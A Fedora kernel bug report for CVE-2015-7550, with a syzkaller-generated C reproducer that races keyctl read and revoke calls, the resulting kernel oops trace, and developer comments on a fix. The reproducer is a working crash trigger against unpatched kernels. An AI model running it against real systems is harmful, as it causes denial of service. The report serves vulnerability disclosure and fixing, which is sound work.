Bug 1290370 - kernel: GPF in keyctl
Summary: kernel: GPF in keyctl
Keywords:
Status: CLOSED CURRENTRELEASE
Alias: None
Product: Fedora
Classification: Fedora
Component: kernel
Version: rawhide
Hardware: Unspecified
OS: Unspecified
unspecified
high
Target Milestone: ---
Assignee: David Howells
QA Contact: Fedora Extras Quality Assurance
URL:
Whiteboard:
Depends On:
Blocks: CVE-2015-7550
TreeView+ depends on / blocked
 
Reported: 2015-12-10 10:50 UTC by Dmitry Vyukov
Modified: 2016-05-27 14:16 UTC (History)
7 users (show)

Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Clone Of:
Environment:
Last Closed: 2016-05-27 14:16:40 UTC
Type: Bug
Embargoed:


Attachments (Terms of Use)
Simplified testcase (948 bytes, text/x-csrc)
2015-12-10 17:00 UTC, David Howells
no flags Details
Patch to fix race between read and revoke (2.90 KB, patch)
2015-12-11 17:53 UTC, David Howells
no flags Details | Diff

Description Dmitry Vyukov 2015-12-10 10:50:17 UTC
On upstream commit 6764e5ebd5c62236d082f9ae030674467d0b2779 (Dec 9).

The following program causes GPF in keyctl:

// autogenerated by syzkaller (http://github.com/google/syzkaller)
#include <syscall.h>
#include <string.h>
#include <stdint.h>
#include <pthread.h>

long r4;

void *thr0(void *arg)
{
	long r5 = syscall(SYS_keyctl, 0x3ul, r4, 0, 0, 0, 0);
	return 0;
}

void *thr1(void *arg)
{
	long r6 = syscall(SYS_keyctl, 0xbul, r4, 0x20000000ul, 0x1000ul, 0, 0);
	return 0;
}

int main()
{
	long r0 = syscall(SYS_mmap, 0x20000000ul, 0x10000ul, 0x3ul, 0x32ul, 0xfffffffffffffffful, 0x0ul);
	memcpy((void*)0x20000e56, "\x75\x73\x65\x72\x00", 5);
	memcpy((void*)0x2000074a, "\x25\x00", 2);
	memcpy((void*)0x20000f77, "\x56\x47\x22\x1d\x9e\xa4\xd3\xf5\x4d\x1b\xd5\xf9\x3f\x92\xd5\xad\x79\xd9\x74\x5a\xda\x21\x45\x09\x3c\xed\x24\x31\x0c\x57\x3f\x4d\xe7\xe0\x3e\x5a\xb2\xb3\xf5\x57\x51\x17\xb7\xa3\x61\xc1\xb7\xc1\xf2\x16\x3a\xb4\x8e\x28\xd0\xcc\x1b\xbb\x4c\x4f\x3e\x90\x6f\x1a\xe2\xe8\x99\x52\x8a\x8a\x10\x6b\x60\xd7\x27\x83\xe0\x70\xc9\x7d\x6d\x25\xa3\xd6\x8c\xf0\x08\xba\xc7\x56\xff\xd6\xd6\x62\xa0\xa5\x54\x5c\xfe\x45\x86\xd3\x39\x6a\xf9\x13\x34\x7a\x0c\xc7\x7e\x87\x44\xb7\x10\x2c\xc5\x75\xe0\x17\x35\xdf\xfe\x98\x6b\xf5\xbc\x0b\xbf\x21\xf8\x6d\x14\x3c\x23\x78\x6e", 137);
	r4 = syscall(SYS_add_key, 0x20000e56ul, 0x2000074aul, 0x20000f77ul, 0x89ul, 0xfffffffffffffffcul, 0);
	pthread_t th[5];
	pthread_create(&th[0], 0, thr0, 0);
	pthread_create(&th[1], 0, thr1, 0);
	pthread_create(&th[2], 0, thr0, 0);
	pthread_create(&th[3], 0, thr1, 0);
	pthread_join(th[0], 0);
	pthread_join(th[1], 0);
	pthread_join(th[2], 0);
	pthread_join(th[3], 0);
	return 0;
}


BUG: unable to handle kernel NULL pointer dereference at 0000000000000010
IP: [<ffffffff816870b7>] user_read+0x37/0xb0 security/keys/user_defined.c:196
PGD 35b9b067 PUD 34c71067 PMD 0
Oops: 0000 [#1] SMP
Modules linked in:
CPU: 1 PID: 7020 Comm: a.out Not tainted 4.4.0-rc4+ #53
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011
task: ffff88003243db00 ti: ffff8800364f0000 task.ti: ffff8800364f0000
RIP: 0010:[<ffffffff816870b7>]  [<ffffffff816870b7>] user_read+0x37/0xb0
RSP: 0018:ffff8800364f3ee0  EFLAGS: 00010206
RAX: 0000000000000001 RBX: ffff8800008a8000 RCX: 0000000000000001
RDX: 0000000000000001 RSI: 0000000020000000 RDI: ffff8800008a8000
RBP: ffff8800364f3f00 R08: 0000000000000000 R09: 0000000000000001
R10: ffff88003243db00 R11: ffff88003243e2b8 R12: 0000000000001000
R13: 0000000020000000 R14: 0000000000000000 R15: 0000000000001000
FS:  00007ff559f38700(0000) GS:ffff88003ed00000(0000) knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 000000008005003b
CR2: 0000000000000010 CR3: 0000000035fe6000 CR4: 00000000000006e0
Stack:
 ffffffffffffffa1 ffff8800008a8020 ffff8800008a8000 0000000020000000
 ffff8800364f3f38 ffffffff81683d7a 00007ff559f38700 0000000000000000
 0000000000000000 00007ff559f389c0 00007ff559f38700 ffff8800364f3f48
Call Trace:
 [<ffffffff81683d7a>] keyctl_read_key+0xba/0xf0 security/keys/keyctl.c:761
 [<     inline     >] SYSC_keyctl security/keys/keyctl.c:1595
 [<ffffffff81684bd4>] SyS_keyctl+0xa4/0x170 security/keys/keyctl.c:1553
 [<ffffffff823fe676>] entry_SYSCALL_64_fastpath+0x16/0x7a arch/x86/entry/entry_64.S:185
Code: 54 49 89 d4 53 48 89 fb e8 27 bc a9 ff 85 c0 74 10 80 3d b0 a7 70 01 00 75 07 48 83 7b 20 00 74 57 4c 8b b3 f0 00 00 00 4d 85 ed <41> 0f b7 5e 10 74 3a 4d 85 e4 74 35 49 39 dc be dc 02 00 00 48
RIP  [<ffffffff816870b7>] user_read+0x37/0xb0 security/keys/user_defined.c:196
 RSP <ffff8800364f3ee0>
CR2: 0000000000000010
---[ end trace acbace9643063ebd ]---

Comment 1 David Howells 2015-12-10 17:00:09 UTC
Created attachment 1104416 [details]
Simplified testcase

Here's a cleaned up version of the testcase.

Comment 2 David Howells 2015-12-10 17:01:29 UTC
Compile the cleaned up testcase with:

    make keyctl-gpf LDLIBS="-lpthread -lkeyutils"

Comment 3 David Howells 2015-12-11 17:53:06 UTC
Created attachment 1104753 [details]
Patch to fix race between read and revoke

Comment 4 Josh Boyer 2015-12-14 15:23:59 UTC
(In reply to David Howells from comment #3)
> Created attachment 1104753 [details]
> Patch to fix race between read and revoke

This probably needs the "Cc: stable.org" tag in the commit log when you send it upstream.

Comment 5 Josh Boyer 2016-05-27 14:16:40 UTC
This went upstream as commit b4a1b4f5047e4f54e194681125c74c0aa64d637d


Note You need to log in before you can comment on or make changes to this bug.